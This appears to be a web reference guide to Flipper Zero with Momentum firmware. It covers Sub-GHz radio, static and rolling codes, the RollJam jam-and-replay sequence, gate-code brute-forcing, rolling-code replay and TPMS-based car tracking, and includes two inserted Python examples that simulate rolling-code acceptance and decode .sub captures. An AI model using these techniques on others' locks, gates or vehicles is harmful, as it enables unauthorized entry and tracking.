The Momentum Encyclopedia

Every app, feature, protocol, and CLI command for Flipper Zero + Momentum firmware. The definitive reference.

80+ apps documented · 11 major sections · 40+ protocols · 100+ CLI commands
🐬 What is Flipper Zero + Momentum

The Swiss Army knife of wireless hacking. A pocket-sized multi-tool for pentesters, researchers, and curious hackers — supercharged with Momentum custom firmware.

🔧 Hardware Overview

Flipper Zero packs seven radio interfaces into a device the size of a car key. Here's what's inside:

| Module | Chip | Frequency | What It Does |
|---|---|---|---|
| Sub-GHz | TI CC1101 | 300–928 MHz (stock) / 281–962 MHz (Momentum) | Garage doors, car keyfobs, weather stations, doorbells, wireless sensors |
| NFC | ST25R3916 | 13.56 MHz | MIFARE Classic, Ultralight, NTAG, DESFire, transit cards, access badges |
| 125 kHz RFID | Custom analog | 125 kHz | HID ProxCard, EM4100, Indala — building access, old hotel keys |
| Infrared | TSOP75338 + IR LED | 38 kHz carrier | TVs, ACs, projectors, fans — any IR remote |
| Bluetooth | STM32WB55 (built-in) | 2.4 GHz BLE 5.0 | BLE spam, Bad Keyboard, FindMy, HID devices |
| GPIO | 18 pins (3.3V) | n/a | UART, SPI, I2C, 1-Wire, analog — connect WiFi boards, sensors, modules |
| USB-C | USB 2.0 FS | n/a | BadUSB, data transfer, charging, UART bridge |
| iButton | 1-Wire contact | n/a | Dallas/Cyfral/Metakom keys (intercom access) |

Additional hardware: 1.4" 128×64 LCD (monochrome, orange backlight or RGB with Momentum), microSD slot (up to 256GB), 5-button d-pad + back button, 2000mAh battery (~7 days standby, ~2 hours active radio use), vibration motor.

Why Momentum Over Stock Firmware

Momentum is the most actively developed custom firmware for Flipper Zero. Here's what you get over the official firmware:

| Feature | Stock Firmware | Momentum |
|---|---|---|
| Sub-GHz Range | 300–928 MHz | 281–361, 378–481, 749–962 MHz (extended) |
| Rolling Codes | Read only (no replay) | Full capture + replay (KeeLoq, StarLine, Nice, etc.) |
| BLE Spam | Not available | Apple, Samsung, Google, Windows, Sour Apple |
| Bad Keyboard | Not available | Wireless BadUSB via Bluetooth |
| FindMy Flipper | Not available | Track via Apple FindMy network |
| Extra Apps | ~15 built-in | 80+ apps (Metroflip, MFKey, Marauder, etc.) |
| RGB Backlight | Orange only | Full RGB color customization |
| Asset Packs | Limited animations | 100+ community animation packs |
| Passport | Basic | Custom themes, backgrounds, icons |
| Sub-GHz Bruteforcer | Not available | Brute force static codes for gates/barriers |
| Protocol Support | Standard set | Extended with community contributions |
Note
Momentum merges upstream Flipper updates quickly, so you get stock features + all the extras. It's maintained by a dedicated team and has the largest community of any custom firmware.
🚀 Quick Start Guide

Flash Momentum Firmware

Connect Flipper to computer via USB-C cable. Make sure it's powered on.
Open Chrome/Edge and go to momentum-fw.dev/update (requires WebSerial — Chrome/Edge only).
Click "Connect" and select your Flipper from the serial port list.
Select Release channel (stable) and click "Install". The process takes ~3 minutes.
Flipper reboots automatically. You're running Momentum! Check via Menu → Settings → About.
Tip
First flash may require you to enter DFU mode: hold ← (back) + ◀ (left) while plugging in USB. The LED turns blue in DFU mode.

Set Up the Dashboard

This site (flipper.llm.kaveenk.com) provides a remote dashboard for controlling your Flipper Zero. It connects via a bridge running on the same network as your Flipper. Use it to send CLI commands, trigger Sub-GHz transmissions, read NFC cards, and more — all from your browser.

Essential First Steps

  • Insert a microSD card — most features require it for storage (saved signals, keys, databases)
  • Update databases — go to Momentum App → keep the NFC/RFID/IR databases up to date
  • Configure Sub-GHz region — Momentum App → Protocols → enable extended frequencies
  • Set up GPIO — if you have a WiFi Dev Board, attach it to the GPIO header now
📡 Sub-GHz Radio

The CC1101 radio transceiver handles everything from garage doors and car keyfobs to weather stations and wireless doorbells. Momentum unlocks extended frequencies, rolling code replay, and brute-force attacks. This section covers the radio hardware, modulation types, every supported protocol, and real-world attack scenarios.

📻 How Sub-GHz Radio Actually Works
🔬 The CC1101 Transceiver — What It Can & Can't Do
Beginner

"Sub-GHz" means any radio frequency below 1 GHz. These frequencies are used worldwide for low-power, long-range communication — think garage doors, car keyfobs, weather stations, and IoT sensors. They travel farther than WiFi or Bluetooth and penetrate walls better.

The Flipper Zero uses a Texas Instruments CC1101 transceiver chip — a dedicated radio IC that handles both transmitting and receiving. Here's what's inside:

📡 Antenna: Internal PCB antenna, or external via CC1101 module
CC1101 IC: Texas Instruments radio transceiver, 300–928 MHz
🧠 MCU: STM32WB55 processes decoded signals
📤 TX Power: Max +10 dBm (~10 mW)
📥 RX Sensitivity: -116 dBm @ 0.6 kBaud
📊 Data Rate: 0.6–500 kBaud configurable
What It CAN Do
  • Receive and transmit on 300–928 MHz (stock) or 281–962 MHz (Momentum)
  • Decode 40+ protocols automatically (Princeton, CAME, KeeLoq, weather stations, etc.)
  • Capture raw radio data for unknown protocols
  • Multiple modulation modes: ASK/OOK, 2-FSK, 4-FSK, GFSK, MSK
  • Act as a frequency analyzer to detect unknown transmissions
What It CAN'T Do
  • WiFi or Bluetooth — those are 2.4 GHz, completely different hardware
  • Cellular signals — 700+ MHz cellular uses different modulation and power
  • Wideband signals — CC1101 is narrowband only (~58 kHz max bandwidth)
  • Simultaneous TX/RX — it's half-duplex, one direction at a time
  • Jam effectively at range — 10 mW is very low power compared to actual jammers
Range
| Setup | Indoor Range | Outdoor Range |
|---|---|---|
| Internal antenna | ~20–50 m | ~50–100 m |
| External CC1101 module | ~50–100 m | ~200–500 m |
| External + directional antenna | N/A | ~500 m–1+ km |
Legal Note
Transmission power is regulated by region. In the US, FCC Part 15 limits unlicensed Sub-GHz transmissions to specific frequencies and power levels. The Flipper's +10 dBm is well within legal limits for ISM bands (315, 433, 868, 915 MHz), but transmitting on other frequencies may violate regulations. Momentum's extended range opens frequencies outside these bands — know your local laws.
〰️ Modulation Types Explained Simply
Beginner

Modulation is how data is encoded into radio waves. Different devices use different modulation, and the Flipper must match the modulation to decode a signal. Think of it like languages — the Flipper speaks several.

ASK / OOK
Amplitude Shift Keying / On-Off Keying
Simplest form. Signal is either on (1) or off (0). Like flashing a flashlight. Extremely common in consumer devices.
📍 Garage doors, doorbells, cheap remotes, fan remotes, power outlets
2-FSK
Frequency Shift Keying
Shifts between two frequencies to represent 1s and 0s. More resistant to noise than ASK. The signal is always "on" — just at different pitches.
📍 Car keyfobs, some weather stations, TPMS sensors
GFSK
Gaussian Frequency Shift Keying
FSK with a Gaussian filter that smooths transitions, reducing bandwidth. Used in protocols that need cleaner signals.
📍 Some sensors, Bluetooth-adjacent protocols, newer IoT
MSK
Minimum Shift Keying
Special case of FSK with minimum frequency deviation. Very spectrum-efficient.
📍 Specialized industrial, some pager protocols
Practical Tip
Don't know the modulation? Use Read first — it tries known protocols automatically. If that fails, use Read RAW to capture the raw waveform regardless of modulation. You can also use the CLI's subghz decode_raw to try decoding with different parameters offline.
🔐 Static vs Rolling Codes — The Key Difference
🔑 Static Codes — The Password That Never Changes
Beginner

A static code system sends the exact same signal every single time you press the button. Like a password that never changes. Capture it once, and you can replay it forever.

STATIC CODE — Same signal every time
  Press 1: [AA BB CC DD] → Garage opens ✅
  Press 2: [AA BB CC DD] → Garage opens ✅ (same code!)
  Press 3: [AA BB CC DD] → Garage opens ✅ (still the same!)
  Flipper replay: [AA BB CC DD] → Garage opens ✅ (captured code works!)
Where You'll Find Static Codes
  • Old garage doors — DIP switch models (set code with physical switches inside the remote)
  • Wireless doorbells — almost all consumer doorbells
  • Cheap RF power outlets — 433 MHz remote-controlled plugs
  • Fan remotes — ceiling fan RF controllers
  • Gate remotes (older) — CAME, Nice FLO, Linear, GateTX
  • Restaurant buzzers — most pager-style buzzers
Common Static Code Protocols
Princeton (24-bit), CAME (12/24-bit), Nice FLO (12-bit), Linear (10-bit), Gate TX, Holtek HT12x, Ansonic, SMC5326, Marantec, Honeywell
How to Tell
If you capture a signal twice and the data is identical — it's static. Also, devices with physical DIP switches for code setting are always static.
🔄 Rolling Codes — One-Time Passwords for Radio
Intermediate

A rolling code (also called "hopping code") generates a different signal every press. Both the remote and receiver share a secret key and a synchronized counter. Each press increments the counter and produces a new cryptographic code. Capturing a code is useless — it's already been "consumed."

ROLLING CODE — Different signal every time
  Press 1: [CODE_0x001] → Garage opens ✅ (counter: 1)
  Press 2: [CODE_0x002] → Garage opens ✅ (counter: 2)
  Press 3: [CODE_0x003] → Garage opens ✅ (counter: 3)
  Flipper replay: [CODE_0x001] → REJECTED (already used!)
  Flipper replay: [CODE_0x002] → REJECTED (already used!)
How the Counter Sync Works
  • Remote and receiver both start at counter value N
  • Each press increments the remote's counter and generates a code: encrypt(counter, secret_key)
  • The receiver only accepts codes with a counter ahead of its last-seen value
  • There's a window (typically 256 codes ahead) — so pressing the button when out of range doesn't permanently desync
  • If someone replays a code with a counter behind the receiver's current position → rejected
Stock vs Momentum Firmware
| Capability | Stock Firmware | Momentum Firmware |
|---|---|---|
| Capture rolling codes | ✅ Yes | ✅ Yes |
| Decode rolling code protocol | ✅ Yes | ✅ Yes |
| Replay rolling codes | ❌ Blocked | ✅ Allowed |
| Pair as new remote | ❌ No | ✅ Yes (Add Manually) |
| Brute force static codes | ❌ No app | ✅ Bruteforcer app |
Common Rolling Code Protocols
KeeLoq, Security+ 2.0, Chamberlain, StarLine, Nice FloR-S, CAME Atomo, Doorhan, Somfy RTS, BFT Mitto, Alutech
Legal Warning
Replaying or manipulating rolling codes on devices you don't own is illegal. Use only on your own equipment for security research and education.
⚔️ The RollJam Attack — How Rolling Codes Get Beaten
Expert

The RollJam attack (demonstrated by Samy Kamkar in 2015) exploits a fundamental weakness in rolling code systems. It doesn't break the crypto — it games the protocol.

How It Works
Victim presses remote — the attacker jams the signal so the receiver never gets it, while simultaneously recording the code (CODE_001).
Victim presses again (thinking the first press didn't work) — the attacker jams AND records this second code (CODE_002), then replays CODE_001 to open the door. Victim thinks their remote worked.
Now the attacker has CODE_002 — an unused, valid rolling code. The receiver is at counter 001. CODE_002 is still in the acceptance window.
The attacker can replay CODE_002 at any point later to open the door.
ROLLJAM ATTACK SEQUENCE
  Step 1: Victim press → [CODE_001] → JAMMED (attacker records CODE_001)
  Step 2: Victim press → [CODE_002] → JAMMED (attacker records CODE_002)
          Attacker replays → [CODE_001] → Door opens (victim happy)
  Step 3: Attacker now has CODE_002 → unused, valid → FULL ACCESS
Why This Works
  • Rolling code receivers accept codes within a window ahead of the last accepted counter
  • If CODE_001 was accepted and CODE_002 is next in sequence, it's valid
  • The jamming prevents the receiver from ever seeing the code, so the counter doesn't advance past it
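To make the counter and acceptance-window rules concrete (both the "How the Counter Sync Works" list above and the "Why This Works" reasoning here), below is an added simulation of a rolling-code receiver; it is not Flipper or Momentum code, uses a constructed HMAC as a stand-in for the real cipher, and assumes the 256-code window the text describes.

```python
import hmac
import hashlib

# Constructed demo key shared by remote and receiver; not a real device key.
SHARED_SECRET = b"constructed-demo-secret"
WINDOW = 256  # how far ahead of its last-seen counter the receiver will accept


def make_code(counter: int, key: bytes = SHARED_SECRET) -> bytes:
    """Stand-in for encrypt(counter, secret_key): a truncated HMAC of the counter.
    Real systems use KeeLoq or similar; the protocol logic below is the same."""
    return hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()[:4]


class Remote:
    def __init__(self, key: bytes = SHARED_SECRET, start: int = 0):
        self.key, self.counter = key, start

    def press(self) -> bytes:
        """Each press advances the counter and emits a fresh code over the air."""
        self.counter += 1
        return make_code(self.counter, self.key)


class Receiver:
    def __init__(self, key: bytes = SHARED_SECRET, start: int = 0, window: int = WINDOW):
        self.key, self.last_seen, self.window = key, start, window

    def accept(self, code: bytes) -> bool:
        """Accept only a code whose counter lies in (last_seen, last_seen + window];
        anything at or behind last_seen is a replay and is rejected."""
        for counter in range(self.last_seen + 1, self.last_seen + self.window + 1):
            if hmac.compare_digest(make_code(counter, self.key), code):
                self.last_seen = counter  # consumed: every earlier code is now dead
                return True
        return False


def simulate() -> dict:
    """Walk through the scenarios described on the page and return the outcomes."""
    remote, receiver = Remote(), Receiver()
    results = {}

    # 1. Normal operation: a press is accepted exactly once; replaying it fails.
    first = remote.press()
    results["normal_press_accepted"] = receiver.accept(first)
    results["plain_replay_rejected"] = not receiver.accept(first)

    # 2. Pressing out of range does not desync: the receiver never saw
    #    counters 2..5, but counter 6 is still inside the window.
    for _ in range(4):
        remote.press()
    results["resync_within_window"] = receiver.accept(remote.press())  # counter 6

    # 3. The window is what RollJam relies on: two presses the receiver never saw.
    #    Delivering the first moves last_seen to 7; the second (8) is still valid later.
    held_a, held_b = remote.press(), remote.press()  # counters 7 and 8
    results["withheld_first_accepted_later"] = receiver.accept(held_a)
    results["withheld_second_still_valid"] = receiver.accept(held_b)
    results["receiver_counter"] = receiver.last_seen  # 8

    # 4. A code beyond the window is rejected, which is why a remote that
    #    drifts too far ahead must be re-paired rather than just pressed again.
    stale = make_code(receiver.last_seen + WINDOW + 1)
    results["beyond_window_rejected"] = not receiver.accept(stale)
    return results


if __name__ == "__main__":
    for name, value in simulate().items():
        print(f"{name}: {value}")
```

The time-based and dual-code defenses listed below would change `accept()`: a code would additionally have to arrive within a validity period, or be followed by the next counter value before either is acted on.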
Requirements
  • A jammer on the exact frequency — the Flipper alone can't effectively jam and capture simultaneously (you'd need a second device or external CC1101 module)
  • Proximity — close enough to both jam the receiver and capture the remote's signal
  • Timing — must jam before the receiver processes the signal
Defenses
  • Time-based rolling codes — codes expire after a short window (not commonly implemented)
  • Dual-code verification — receiver requires two consecutive valid codes (some newer systems)
  • Lock-down on jammed signals — receiver detects jamming patterns (rare in consumer gear)
Reality Check
The RollJam attack requires additional hardware beyond the Flipper (a jammer). It's primarily of academic interest and security research value. It demonstrates why rolling codes alone aren't a complete security solution.
📻 Built-in Sub-GHz Features
📥 Read — Capture Signals
Beginner

The primary capture mode. Listens on a specific frequency and decodes known protocols in real-time.

How it works
  • Navigate to Sub-GHz → Read
  • Set frequency (common: 315 MHz, 433.92 MHz, 868 MHz, 915 MHz)
  • Press a button on the target remote — Flipper decodes the signal
  • Save the capture for later replay
What you can capture
  • Garage door openers — static code remotes (older DIP switch models)
  • Car keyfobs — signal is visible, but rolling codes won't replay on stock firmware
  • Weather stations — temperature/humidity data from Oregon Scientific, Acurite, LaCrosse, etc.
  • Doorbells — wireless doorbell chimes
  • Wireless sensors — motion detectors, door/window sensors, smoke alarms
  • Gate remotes — barrier gates, parking lot remotes
Tip
Don't know the frequency? Use Frequency Analyzer first to detect what frequency a device transmits on.
📊 Read RAW — Capture Raw Radio Data
Intermediate

Captures raw radio data without trying to decode it. Essential for unknown or unsupported protocols.

When to use
  • The signal isn't recognized by the standard Read mode
  • You need to capture the exact waveform for analysis
  • Custom or proprietary protocols
  • Complex signals with multiple components
Usage
  • Sub-GHz → Read RAW
  • Set frequency, press record (●), trigger the remote, stop recording
  • File saved as .sub with raw timing data
  • Can be replayed from Saved menu
  • Can be analyzed with subghz decode_raw CLI command
Note
RAW captures are larger files than decoded captures. They record exact pulse/gap timings. Quality depends on signal strength — get close to the transmitter.
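As an added example (not Flipper firmware code), here is a minimal parser for the RAW .sub layout described above together with a Princeton/PT2262-style OOK decoder, used to apply the "How to Tell" rule from the static-codes section: decode two captures and compare. The sample captures are constructed inline (the 24-bit key is made up); the header keys are the ones the Flipper writes, while the pulse tolerance and the sync-gap threshold are assumptions.

```python
"""Parse Flipper RAW .sub captures and decode Princeton (PT2262-style) OOK frames."""

TE = 400          # Princeton timing element in µs (the <te> the CLI reference uses)
TE_DELTA = 150    # assumed tolerance: how far a pulse may drift from a multiple of TE
CONSTRUCTED_KEY = 0x12AB34   # constructed 24-bit demo code, not from a real remote


def parse_sub_file(text: str):
    """Return (header dict, list of signed pulse durations in µs).
    Positive = carrier on, negative = carrier off; RAW_Data may span several lines."""
    header, raw = {}, []
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "RAW_Data":
            raw.extend(int(v) for v in value.split())
        else:
            header[key] = value
    return header, raw


def decode_princeton(raw, te=TE, te_delta=TE_DELTA):
    """Classify each (on, off) pair: 1*te/3*te -> bit 0, 3*te/1*te -> bit 1. A long
    silence (assumed > 20*te) is the sync gap that ends a 24-bit frame. Returns keys."""
    def near(duration, units):
        return abs(duration - units * te) <= te_delta

    frames, bits, i = [], [], 0
    while i + 1 < len(raw):
        on, off = raw[i], -raw[i + 1]
        if on <= 0 or off <= 0:          # lost on/off alternation: resync by one pulse
            bits, i = [], i + 1
            continue
        i += 2
        if off > 20 * te:                # sync gap closes the frame
            if near(on, 1) and len(bits) == 24:
                frames.append(int("".join(bits), 2))
            bits = []
        elif near(on, 1) and near(off, 3):
            bits.append("0")
        elif near(on, 3) and near(off, 1):
            bits.append("1")
        else:                            # glitch: drop the partial frame
            bits = []
    return frames


def looks_static(capture_a: str, capture_b: str) -> bool:
    """The page's rule of thumb: two captures that decode to the same code are static."""
    codes_a = decode_princeton(parse_sub_file(capture_a)[1])
    codes_b = decode_princeton(parse_sub_file(capture_b)[1])
    return bool(codes_a) and set(codes_a) == set(codes_b)


# --- constructed sample input (only so the example runs offline) ---------------
def _constructed_frame(key24, te=TE, jitter=40):
    """Pulses for one PT2262-style frame, MSB first, with alternating +/- jitter."""
    pulses, sign = [], 1
    for i in range(23, -1, -1):
        on_units, off_units = (3, 1) if (key24 >> i) & 1 else (1, 3)
        pulses += [on_units * te + sign * jitter, -(off_units * te) - sign * jitter]
        sign = -sign
    return pulses + [te, -31 * te]        # sync: one short on, then a long silence


def _constructed_sub_text(pulses, chunk=50):
    lines = ["Filetype: Flipper SubGhz RAW File", "Version: 1",
             "Frequency: 433920000", "Preset: FuriHalSubGhzPresetOok650Async",
             "Protocol: RAW"]
    for start in range(0, len(pulses), chunk):
        lines.append("RAW_Data: " + " ".join(str(p) for p in pulses[start:start + chunk]))
    return "\n".join(lines) + "\n"


CAPTURE_1 = _constructed_sub_text(_constructed_frame(CONSTRUCTED_KEY) * 2)
CAPTURE_2 = _constructed_sub_text(_constructed_frame(CONSTRUCTED_KEY, jitter=25) * 2)
CAPTURE_OTHER = _constructed_sub_text(_constructed_frame(CONSTRUCTED_KEY + 1) * 2)

if __name__ == "__main__":
    header, raw = parse_sub_file(CAPTURE_1)
    print(header["Frequency"], [hex(k) for k in decode_princeton(raw)])
    print("static:", looks_static(CAPTURE_1, CAPTURE_2))      # True
    print("static:", looks_static(CAPTURE_1, CAPTURE_OTHER))  # False
```

Two real captures of the same button that decode to different keys, or that decode to nothing, point at a rolling code or an unsupported encoding; in that case fall back to the Flipper's own Read or decode_raw rather than this 24-bit decoder.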
📤 Saved — Replay Captured Signals
Beginner

Browse your saved .sub files and replay them. This is how you transmit captured signals.

  • Sub-GHz → Saved → browse SD card folders
  • Select a file → press Send (→) to transmit
  • Works for static codes immediately
  • Rolling codes: stock firmware blocks replay; Momentum allows it
File Organization

Saved files go to /ext/subghz/ on the SD card. Organize by folder:

/ext/subghz/
├── garage/
│   ├── home_garage.sub
│   └── work_gate.sub
├── doorbells/
│   └── front_door.sub
└── weather/
    └── station_433.sub
📈 Frequency Analyzer
Beginner

Real-time spectrum analyzer that shows which frequency a device is transmitting on.

  • Sub-GHz → Frequency Analyzer
  • Press the remote/button you want to analyze
  • Flipper shows the detected frequency with signal strength
  • Use this frequency in Read or Read RAW mode

Common frequencies to know:

| Frequency | Region | Common Uses |
|---|---|---|
| 315.00 MHz | North America | Garage doors, car keyfobs (older US vehicles) |
| 390.00 MHz | North America | Some car keyfobs (GM, older models) |
| 433.92 MHz | Worldwide | Most common — weather stations, doorbells, remotes, sensors |
| 868.35 MHz | Europe | Gate remotes, alarm systems, IoT devices |
| 915.00 MHz | North America | ISM band, LoRa, some IoT |
✏️ Add Manually — Create Signals
Advanced

Create Sub-GHz signals from known protocol parameters without capturing them.

  • Sub-GHz → Add Manually
  • Select protocol (Princeton, CAME, Nice FLO, etc.)
  • Enter key/data value, bit length
  • Set frequency and save

Useful when you know the exact code (e.g., from documentation, DIP switch positions on a garage remote, or shared by another tool).

Momentum Extras
🔓 Extended Frequency Range
Beginner🐬🐬🐬🐬

Momentum unlocks the full capability of the CC1101 radio chip beyond what stock firmware allows.

| Band | Stock Range | Momentum Range |
|---|---|---|
| Low | 300–348 MHz | 281–361 MHz |
| Mid | 387–464 MHz | 378–481 MHz |
| High | 779–928 MHz | 749–962 MHz |

Enable via: Momentum App → Protocols → Sub-GHz → Extend

Warning
Extended frequencies may violate local radio regulations. Transmitting outside licensed bands is illegal in many jurisdictions. Know your local laws.
🔄 Rolling Code Capture & Replay
Advanced🐬🐬🐬🐬🐬

Stock firmware intentionally blocks replaying rolling (hopping) codes. Momentum removes this restriction, enabling capture and replay of rolling code signals.

How Rolling Codes Work

Each button press generates a unique code from a synchronized counter. The receiver only accepts the next expected code in sequence. Capturing and replaying an old code normally doesn't work because the receiver has already moved past it.

Why Replay Can Still Work
  • Jam + Capture — Block the original signal while recording it. The receiver never sees the code, so it remains valid. Requires a secondary jammer.
  • RollJam attack — Jam the first press, capture it. Victim presses again, jam + capture the second code. Replay the first code (victim's car opens), save the second for later.
  • Code window vulnerability — Many receivers accept codes within a window of ~256 ahead of current counter. If you capture a code the victim hasn't used yet, it may still be valid.
Supported Rolling Code Protocols
KeeLoq, StarLine, Nice FLO R-S, CAME Atomo, Doorhan, Security+ 2.0, Chamberlain, Alutech, BFT Mitto, Somfy RTS
Legal Warning
Replaying car keyfob or garage rolling codes without authorization is illegal. Use only on your own devices for security research.
🔨 Sub-GHz Bruteforcer
Advanced🐬🐬🐬🐬

Systematically tries all possible codes for a given protocol. Works only against static code systems (no rolling codes).

Supported Protocols
  • Chamberlain 9-bit — 512 codes, ~2 minutes
  • Chamberlain 8-bit — 256 codes, ~1 minute
  • Linear 10-bit — 1024 codes, ~4 minutes
  • Nice 12-bit — 4096 codes, ~17 minutes
  • CAME 12-bit — 4096 codes, ~17 minutes
  • Princeton 24-bit (custom) — specify prefix, brute remainder
Usage
  • Navigate to Sub-GHz → Bruteforcer (Momentum menu)
  • Select protocol and frequency
  • Start the brute force — Flipper cycles through all codes
  • When the gate/device responds, note the working code
Warning
Brute forcing takes time and may trigger lockouts on some systems. Only use on devices you own or have explicit authorization to test.
Sub-GHz Scheduler
Intermediate🐬🐬🐬

Schedule Sub-GHz transmissions for a specific time. Set up a signal to transmit later — useful for timed automation tests.

  • Select a saved .sub file
  • Set the time and frequency
  • Flipper transmits automatically at the scheduled time
🤝 Flipper Share
Beginner🐬🐬

Share captured Sub-GHz signals between two Flipper Zero devices wirelessly using the Sub-GHz radio itself. One Flipper transmits the capture data, another receives it.

📟 HC-11 Modem
Advanced🐬🐬

Use the Flipper as an HC-11 compatible UART modem over Sub-GHz radio. Enables serial communication between devices at 433 MHz.

  • Emulates HC-11 wireless serial module
  • Send/receive UART data wirelessly
  • Useful for IoT prototyping and embedded systems testing
📊 Sub Analyzer — Spectrum Analysis
Intermediate🐬🐬🐬

Visual spectrum analyzer showing real-time RSSI (signal strength) across a frequency range. Sweep across bands to find active transmitters.

  • Sweep configurable frequency range
  • Visual waterfall/graph display
  • Identify active frequencies before targeted capture
  • Useful for RF environment mapping
💬 Sub-GHz Chat
Beginner🐬🐬🐬🐬

Send text messages between two Flipper Zero devices using Sub-GHz radio — no WiFi, cellular, or internet required.

  • Both Flippers set to same frequency (e.g., 433.92 MHz)
  • Type messages using Flipper's on-screen keyboard or via CLI
  • Range depends on environment: ~50m indoors, ~200m outdoors with clear line of sight
  • CLI: subghz chat <freq>
🏠 Pair Flipper as a Garage Remote (Momentum)
🔧 Step-by-Step: Register Flipper as a Legitimate Remote
Intermediate🐬🐬🐬🐬🐬

Instead of replaying captured signals, you can register the Flipper as a brand new remote with your garage door opener. The opener "learns" the Flipper's signal, making it a legitimate paired device — no replay, no hacking. This works because the Flipper can generate valid protocol signals that the opener's "learn" mode accepts.

Requirement
This requires Momentum firmware (or another custom firmware that unlocks Add Manually for rolling code protocols). Stock firmware does not support generating new rolling code signals.
Before You Start
  • Find your garage door opener model number (printed on the motor unit on your ceiling)
  • Determine the protocol: most modern US openers use Security+ or Security+ 2.0 (Chamberlain, LiftMaster, Craftsman)
  • Determine the frequency: check the FCC label on your existing remote or the opener unit
    • LiftMaster/Chamberlain (purple learn button) → 310 MHz
    • LiftMaster/Chamberlain (yellow learn button) → 315 MHz
    • LiftMaster/Chamberlain (red/orange learn button) → 390 MHz
    • Chamberlain myQ (newer) → Security+ 2.0 @ 310 or 315 MHz
Pairing Steps
On the Flipper: Navigate to Sub-GHz → Add Manually
Select the protocol: Choose Cham_Code (Security+) or Security+ 2.0, depending on your opener
Set the frequency: Match your opener (310, 315, or 390 MHz). Leave the key/serial at default — the opener doesn't care about the specific code during learning, just the protocol format.
Save the signal with a descriptive name (e.g., "Home_Garage")
On the opener: Press and hold the Learn button on the motor unit until the LED lights up (usually ~6 seconds). The location varies by model but it's typically near the antenna wire.
On the Flipper: Go to Saved → Home_Garage → Send. Transmit the signal within 30 seconds of pressing the Learn button.
The opener's LED should blink or turn off, confirming it learned the Flipper as a new remote. Test it — transmit again and the door should respond.
Pro Tips
  • If it doesn't work on the first try, delete the signal, create a new one with a different key/serial value, and try again. Some openers are picky about format.
  • Each "learned" signal is a unique remote. You can pair multiple signals for different buttons (open, close, light).
  • This does NOT work with openers that require proprietary multi-channel handshakes (some newer myQ models).
  • For European gates using CAME, Nice, BFT — the same process works with their respective protocols.
Important
Only pair with garage doors you own. Adding a new remote to someone else's opener is unauthorized access.
🌡️ Weather Station Monitoring
Beginner🐬🐬🐬

Most consumer weather stations transmit sensor data at 433 MHz using unencrypted protocols. The Flipper (especially with Momentum) decodes these automatically, letting you see temperature, humidity, and other readings from nearby stations — including your neighbors'.

How to Monitor
  • Navigate to Sub-GHz → Read
  • Set frequency to 433.92 MHz
  • Nearby weather stations will show up as decoded readings with temperature and humidity data
  • Each station has a unique sensor ID — you can track multiple stations simultaneously
Supported Weather Protocols
| Protocol | Data Decoded | Common Brands |
|---|---|---|
| Oregon Scientific V2.1/V3 | Temp, humidity, channel | Oregon Scientific |
| Acurite 592TXR | Temp, humidity, sensor ID | AcuRite |
| Acurite 606TX / 609TXC | Temp, humidity | AcuRite |
| LaCrosse TX | Temp, humidity | La Crosse Technology |
| Ambient Weather | Temp, humidity | Ambient Weather |
| ThermoPRO TX-2 | Temp, humidity | ThermoPro |
| Nexus-TH | Temp, humidity | Nexus, various clones |
| Infactory | Temp, humidity | Infactory |
Fun Project
Walk around your neighborhood with the Flipper in Read mode at 433 MHz. You'll likely pick up 5–10+ weather stations within a few blocks. Each one broadcasts its sensor readings every 30–90 seconds. All completely unencrypted.
🚗 TPMS — Tire Pressure Monitoring
Intermediate🐬🐬🐬

Every car manufactured since 2007 (US) or 2014 (EU) has Tire Pressure Monitoring System sensors in each wheel. These broadcast wirelessly at 315 MHz (North America) or 433 MHz (Europe/Asia) every 60–90 seconds, or immediately when pressure changes.

What the Flipper Decodes
  • Tire pressure — current PSI/kPa
  • Temperature — tire temperature in °C/°F
  • Sensor ID — unique 28/32-bit identifier for each sensor
  • Battery status — some protocols include low-battery flag
Supported TPMS Protocols
Schrader, Schrader GG4, Citroën/Peugeot, Toyota, Ford
Security Concern

TPMS sensor IDs are unique and static — they never change unless the sensor is replaced. This means:

  • Each car has a unique "fingerprint" of 4 TPMS IDs
  • Anyone with a receiver can track a specific car's presence by monitoring for its TPMS IDs
  • This has been demonstrated by researchers as a vehicle tracking vector
  • No encryption, no authentication — just a broadcast beacon on every wheel
Practical Use
Check your own car's tire pressure wirelessly without a gauge. Just park near it with the Flipper in Sub-GHz Read mode at 315 MHz (US) or 433 MHz (EU). Wait up to 90 seconds for the sensors to transmit.
📋 Sub-GHz Protocol Encyclopedia
📡 Complete Protocol Encyclopedia — All 40+ Protocols
Intermediate

Every Sub-GHz protocol supported by Flipper Zero + Momentum firmware, with type, frequency, bit depth, security rating, and common devices.

| Protocol | Type | Frequency | Bits | Security | Common Devices |
|---|---|---|---|---|---|
| Princeton | Static | 433 MHz | 24 | 🔴 None | Generic remotes, doorbells, power outlets, fan remotes |
| CAME | Static | 433 MHz | 12/24 | 🔴 None | European gates, parking barriers |
| CAME Atomo | Rolling | 433 MHz | n/a | 🟡 Weak | Newer CAME gate systems |
| CAME Twee | Static | 433 MHz | 54 | 🔴 None | CAME variant, Italian gates |
| Nice FLO | Static | 433 MHz | 12 | 🔴 None | European gates, barriers (Nice S.p.A.) |
| Nice FloR-S | Rolling | 433 MHz | 52 | 🟡 Weak | Newer Nice gate systems |
| Gate TX | Static | 433 MHz | 24 | 🔴 None | Generic gate remotes |
| Linear | Static | 300/310 MHz | 10 | 🔴 None | Old US garage doors (DIP switches, 1024 codes total) |
| Doorhan (static) | Static | 433 MHz | 24 | 🔴 None | Russian gate systems (older) |
| Doorhan (rolling) | Rolling | 433 MHz | n/a | 🟡 Weak | Russian gate systems (newer) |
| Security+ 1.0 | Rolling | 310/315/390 MHz | 40 | 🟡 Weak | Chamberlain/LiftMaster (older US garage doors) |
| Security+ 2.0 | Rolling | 310/315/390 MHz | 62 | 🟢 Strong | Chamberlain/LiftMaster/Craftsman (modern US garage doors, myQ) |
| Marantec | Static | 433 MHz | n/a | 🔴 None | European garage doors (Marantec GmbH) |
| BFT (static) | Static | 433 MHz | 12 | 🔴 None | European gates (BFT S.p.A., older) |
| BFT Mitto | Rolling | 433 MHz | n/a | 🟡 Weak | European gates (BFT, newer models) |
| Somfy Telis/RTS | Rolling | 433 MHz | 56 | 🟡 Weak | French blinds, shutters, awnings (Somfy Group) |
| StarLine | Rolling | 433 MHz | 64 | 🟡 Weak | Russian car alarm systems |
